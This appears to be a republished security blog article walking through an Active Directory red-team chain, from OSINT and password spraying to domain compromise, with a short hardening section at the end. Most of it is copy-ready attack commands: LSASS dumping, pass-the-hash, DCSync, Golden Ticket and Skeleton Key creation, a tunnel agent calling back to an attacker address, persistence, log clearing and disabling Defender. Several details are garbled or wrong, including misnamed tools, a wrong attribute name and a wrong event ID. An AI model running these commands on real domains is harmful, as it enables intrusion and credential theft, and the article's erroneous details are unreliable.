Listen to this Post

Introduction:
In today’s interconnected enterprise environments, Active Directory (AD) remains the crown jewel for adversaries and penetration testers alike. The transition from open-source intelligence (OSINT) gathering to full domain compromise represents a critical attack path that security teams must understand to defend effectively. This article dissects real-world red team methodologies, leveraging publicly available tools and techniques to demonstrate how attackers chain information gathering, initial access, and privilege escalation to achieve domain dominance, while providing actionable guidance for both offensive and defensive practitioners.
Learning Objectives:
- Master the art of OSINT-driven attack surface mapping to identify external and internal AD entry points.
- Understand and implement pivoting, lateral movement, and privilege escalation techniques using tools like BloodHound, Ligolo-1g, and Impacket.
- Develop a comprehensive mitigation strategy focusing on credential hygiene, tiered administration, and continuous monitoring.
You Should Know:
1. OSINT Reconnaissance: The First Domino
Before launching a single packet, red teams spend significant effort on passive reconnaissance. The goal is to map the target’s digital footprint, discovering email patterns, employee names, technology stacks (e.g., OWA, VPN portals, Citrix), and third-party partnerships. This phase relies heavily on search engines, Shodan, Censys, and social media platforms like LinkedIn to build a target profile.
Step‑by‑step guide:
- Identify Public-Facing Assets: Use `Shodan` to query for the company’s IP ranges. `shodan search “org:TargetCompany”` returns exposed services. Similarly, `Censys` can find SSL certificates associated with the domain.
- Harvest Subdomains: Tools like `Sublist3r` or `Amass` help enumerate subdomains:
amass enum -d target.com. - Enumerate Valid Usernames: Use `Kerbrute` to brute-force AD usernames via Kerberos pre-authentication without needing a password:
kerbrute userenum -d target.com --dc 10.0.0.1 userlist.txt. This identifies valid accounts for targeted password spraying. - Extract Email Patterns: Tools like `theHarvester` gather emails from public sources:
theHarvester -d target.com -b google,linkedin. - Analyze Metadata: Use `exiftool` on publicly available PDFs and Office documents to find internal usernames, server names, and software versions.
exiftool -Author -Creator -LastModifiedBy document.pdf.
2. Initial Access and Enumeration: Gaining a Foothold
With a valid username list and an exposed VPN/OWA portal, attackers spray passwords (e.g., Winter2026!, CompanyName@123) to gain a foothold. Once inside the corporate network via VPN or a compromised endpoint, the immediate priority is internal enumeration. Tools like `BloodHound` (with its collector SharpHound) are indispensable for mapping AD relationships.
Step‑by‑step guide:
- Deploy Ligolo-1g for Pivoting: On the compromised Linux machine, set up Ligolo-1g to create a tunnel to the internal network. `ligolo-1g -selfcert` on your attacker machine, then on the victim:
./agent -connect <attacker_ip>:5555 -ignore-cert. This creates a SOCKS5 proxy, allowing you to route tools through the victim. - Run SharpHound: On a Windows endpoint (often via Cobalt Strike or an interactive shell), execute SharpHound to collect AD data:
SharpHound.exe -c All,GPOLocalGroup,LoggedOn --ldapusername <user> --ldappassword <pass> -d target.com. - Ingest Data into BloodHound: Import the generated `.zip` file into BloodHound. Use the built-in queries (e.g., “Find Shortest Path to Domain Admins”) to visualize attack paths.
- Analyze Machine Quota: Use `PowerView` to check if your current user has “Machine Account Quota” (MS-MCS-AdmPwd) that allows creating a new computer object, which could be leveraged for privilege escalation.
3. Lateral Movement and Credential Dumping
Once inside, attackers move laterally using harvested credentials from LSASS memory, SAM hive, or cached hashes. The classic `Mimikatz` is used for credential extraction, but modern EDRs often detect it. Instead, red teams turn to `DCSync` attacks via `Mimikatz` or `Impacket` to request password hashes from a Domain Controller (DC) by impersonating a DC itself.
Step‑by‑step guide:
- Dump LSASS without Mimikatz: Use `comsvcs.dll` via PowerShell to dump LSASS:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full
- Extract Hashes with Pypykatz: On your Linux attacker box, parse the dump:
pypykatz lsa minidump /path/to/lsass.dmp. - Pass-the-Hash (PtH) with Impacket: Use the NTLM hash to authenticate to other machines. Example:
psexec -hashes :<NTLM_HASH> target.com/[email protected]. - DCSync Attack: From a high-privileged user (e.g., Domain Admin or those with `Replicating Directory Changes` rights), run:
mimikatz "lsadump::dcsync /domain:target.com /user:krbtgt". This retrieves the KRBTGT hash for Golden Ticket creation.
4. Privilege Escalation: The Path to Domain Admin
Enumeration via BloodHound often reveals misconfigurations such as insecure GPOs, unconstrained delegation, or users with “Admin Count” set to 1. Common escalation paths include Kerberoasting, AS-REP Roasting, and exploiting Zero-Logon or PrintNightmare-like vulnerabilities. The attacker’s goal is to obtain a Kerberos ticket granting ticket (TGT) for a Domain Admin account.
Step‑by‑step guide:
- Kerberoast SPNs: Request a service ticket (ST) for a service account and crack it offline. `GetUserSPNs.py -dc-ip 10.0.0.1 target.com/user -request` (Impacket). Extract the hash and crack with Hashcat:
hashcat -m 13100 kerberoast_hashes.txt wordlist.txt. - AS-REP Roast: For users without pre-authentication, request an AS-REP hash:
GetNPUsers.py -dc-ip 10.0.0.1 target.com/ -usersfile users.txt -request. - Abuse Active Directory Certificate Services (AD CS): If AD CS is present, use `Certipy` to find vulnerable templates allowing ESC1 (enrollment with an elevated principal).
certipy find -u [email protected] -p pass -dc-ip 10.0.0.1. If a vulnerable template allows “Client Authentication” and “Supply in Request,” issue a certificate for a Domain Admin. - Golden Ticket: Once you have the KRBTGT hash, create a Golden Ticket to impersonate any user:
mimikatz "kerberos::golden /User:Administrator /domain:target.com /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /id:500 /ptt"
5. Persistence and Domain Dominance
After achieving Domain Admin, attackers establish persistence to maintain access even after password resets. This includes modifying the AdminSDHolder container, creating Skeleton Key backdoors, or adding rogue SPNs for silver tickets.
Step‑by‑step guide:
- AdminSDHolder Manipulation: Use `PowerView` to add your controlled user to the AdminSDHolder group.
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=target,DC=com" -Rights All -PrincipalIdentity "CN=EvilUser,CN=Users,DC=target,DC=com". This ensures the user retains admin rights every 60 minutes. - Skeleton Key: On the DC, inject a skeleton key that allows any user to authenticate with a master password.
mimikatz "privilege::debug" "misc::skeleton". - New GPO for Backdoor: Create a new GPO (or modify an existing one) that deploys a scheduled task to run a reverse shell on all domain-joined machines.
- Modify SPN for Silver Ticket: Add a fake SPN to a high-privilege account to generate Silver Tickets for specific services (CIFS, HOST, HTTP) to access the DC at any time.
6. Covering Tracks and Log Tampering
Sophisticated attackers clear event logs and disable defensive tools to avoid detection. They may also manipulate timestamps and delete artifacts from the Windows Event Logs.
Step‑by‑step guide:
- Clear Security Logs: `wevtutil cl Security` on the target machine. For remote systems, use
Invoke-Command -ComputerName Target -ScriptBlock { wevtutil cl Security }. - Disable Windows Defender:
Set-MpPreference -DisableRealtimeMonitoring $true. Or, add exclusions:Add-MpPreference -ExclusionPath "C:\Tools\". - Timestomping: Use `Set-MacAddress` or modify file timestamps with `sysinternals\filetime.exe` to blend in with legitimate system files.
- Remove PowerShell History: Clear `Get-History` and delete the console history file:
rm (Get-PSReadlineOption).HistorySavePath. - Wipe AMSI Logs: For evasion, use `amsi` bypasses to prevent script logging, and later delete the AMSI log files if accessible.
7. Defensive Countermeasures: Hardening AD
Understanding the attack chain is crucial for defense. The best mitigations include implementing tiered administration, enforcing MFA for all privileged accounts, monitoring for tools like SharpHound, and restricting DCSync rights.
Step‑by‑step guide for defenders:
- Harden AD Delegation: Ensure only a few accounts have `Replicating Directory Changes` rights. Use ADSI Edit to audit these permissions.
- Implement LAPS (Local Administrator Password Solution): Use LAPS to manage local admin passwords, preventing Pass-the-Hash from being effective across workstations.
- Monitor for Sensitive Access: Enable advanced audit policies (e.g.,
Audit SAM,Audit Kerberos Service Ticket Operations) and forward logs to a SIEM. Alerts on `Event ID 4742` (Kerberoast) and `Event ID 4768` (AS-REP Roast). - Restrict NTLM Usage: Enable NTLM auditing and block NTLM for high-privilege accounts to prevent PtH. Use Group Policy:
Network Security: Restrict NTLM. - Deploy EDR with Behavioral Detection: EDRs like Microsoft Defender for Endpoint or CrowdStrike can detect LSASS dumping attempts (
Access to LSASS), `Mimikatz` invocations, and unusual PSExec activities. - Patch Regularly: Prioritize patches for AD CS, Print Spooler, and Zero-Logon (CVE-2020-1472) vulnerabilities that are frequently exploited in attacks.
What Undercode Say:
- Key Takeaway 1: The fusion of OSINT and AD enumeration is not just for penetration tests; it’s a continuous threat that requires organizations to monitor exposed credentials and misconfigured public-facing services actively.
- Key Takeaway 2: Credential theft remains the most effective attack vector—privileged access workstations (PAWs) and just-in-time (JIT) administration are non-1egotiable for reducing the attack surface.
- +Analysis: The rise of certificate-based attacks (AD CS ESC1-ESC8) has shifted the landscape. Many organizations still treat PKI as “secure by default,” but red teams regularly compromise forests through these misconfigurations. Defenders must adopt Certipy and PSPKI scripts to audit their CA configurations as aggressively as attackers.
- -Analysis: Microsoft’s continued reliance on NTLM and Kerberos as primary authentication mechanisms, despite known weaknesses (e.g., unconstrained delegation), forces security teams to implement complex workarounds like delegation hardening and strict credential guard policies that often break legacy applications.
- +Analysis: Blue teams are increasingly using BloodHound Enterprise to proactively “defend” by visualizing their own attack paths. This shift from reactive to proactive defense, known as “Purple Teaming,” is the most positive development in AD security over the last three years.
- -Analysis: However, the simplicity of executing tools like `SharpHound` and `Rubeus` means that even novice attackers can compromise poorly-configured domains. The barrier to entry for AD exploitation has never been lower.
- +Analysis: Cloud-integrated AD (Azure AD / Entra ID) introduces new complexities. The future will see more attacks targeting hybrid identities, where a compromised on-prem domain can pivot to the cloud via synchronization accounts (e.g.,
AzureADConnect). Defenders must immediately harden these connectors. - -Analysis: Many organizations still use standalone servers without proper patching cycles. The “break and fix” mentality in smaller firms leaves them particularly vulnerable to the multi-step attacks described above.
- +Analysis: The cybersecurity community’s response has been strong, with open-source projects like `Soapy` for AD CS, `BloodHound` for visualization, and `CrackMapExec` for automation allowing defenders to simulate and preempt attacks.
- Key Takeaway 3: Ultimately, securing AD is a people-process-technology problem. The tools outlined are merely enablers; the real defense lies in strict least-privilege access, continuous monitoring, and a culture of incident response readiness.
Prediction:
- +1: Over the next 12 months, we will see a surge in enterprise adoption of “Identity Threat Detection and Response” (ITDR) platforms that specifically focus on AD and Azure AD misconfigurations, mirroring the EDR market’s growth.
- -1: As AI-driven OSINT tools become prevalent, attackers will automate the username harvesting and password spraying phases, increasing the speed and scale of initial compromise attempts exponentially.
- -1: The complexity of AD patch management will continue to leave exposed vulnerabilities like “Zerologon” unpatched in non-internet-facing internal networks, leading to a resurgence of these attacks in 2026 as they become “legacy” but still exploitable.
- +1: The red team industry will increasingly pivot to “Attack Path Management,” where tools not only identify paths but also suggest dynamic mitigation steps in real-time, effectively bridging the gap between offensive and defensive operations.
- -1: With the impending quantum computing advancements, current Kerberos encryption (AES-256) will be under threat. While still years away, the seed of “harvest now, decrypt later” attacks will force Microsoft to accelerate the development of post-quantum algorithms, creating a complex migration challenge for enterprises.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Aleborges Redteam – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


